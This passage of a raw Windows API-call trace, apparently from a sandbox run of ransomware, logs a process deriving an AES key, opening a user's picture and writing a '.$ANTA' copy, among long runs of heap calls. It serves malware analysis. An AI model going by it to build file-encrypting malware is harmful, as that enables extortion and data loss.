lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.413] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0089.413] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0089.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca4d8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0089.413] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac6c0, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac700) returned 1 [0089.413] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.413] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0089.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0089.414] CryptDestroyHash (hHash=0x41ac6c0) returned 1 [0089.414] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\kr_O D2ok83jLZ-Nq.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\kr_o d2ok83jlz-nq.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0089.414] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.414] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0089.414] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0089.414] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\kr_O D2ok83jLZ-Nq.jpg.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\kr_o d2ok83jlz-nq.jpg.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0089.418] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0089.418] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x3e7a, lpOverlapped=0x0) returned 1 [0089.419] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0089.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0089.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x3e7a) returned 0x4516010 [0089.422] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0089.422] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0089.422] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0089.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0089.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0089.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0089.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0089.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0089.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0089.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0089.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0089.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0089.423] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.423] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0089.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0089.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0089.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0089.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0089.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1797108 [0089.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0089.423] CryptGetKeyParam (in: hKey=0x41ac700, dwParam=0x7, pbData=0x43e2630, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2630*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0089.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0089.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0089.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0089.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0089.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0089.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0089.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0089.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0089.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0089.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0089.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0089.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0089.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0089.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0089.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0089.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0089.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0089.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0089.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0089.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0089.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0089.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0089.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0089.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0089.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0089.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0089.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0089.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0089.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0089.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0089.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0089.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0089.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0089.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0089.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0089.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0089.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0089.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0089.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0089.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0089.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0089.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0089.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0089.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0089.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0089.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0089.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0089.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0089.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0089.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0089.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0089.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0089.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0089.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0089.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0089.563] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0089.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0089.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0089.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0089.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0089.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0089.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0089.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0089.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0089.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0089.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0089.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0089.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0089.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0089.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0089.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0089.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0089.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0089.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0089.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0089.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0089.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0089.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0089.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0089.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0089.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.565] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0089.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0089.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0089.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0089.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0089.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0089.565] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0089.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0089.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0089.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0089.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0089.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0089.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0089.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0089.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0089.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0089.565] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0089.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0089.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0089.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0089.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0089.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0089.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0089.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0089.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0089.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0089.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0089.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0089.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0089.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0089.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0089.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0089.568] HeapFree (in: 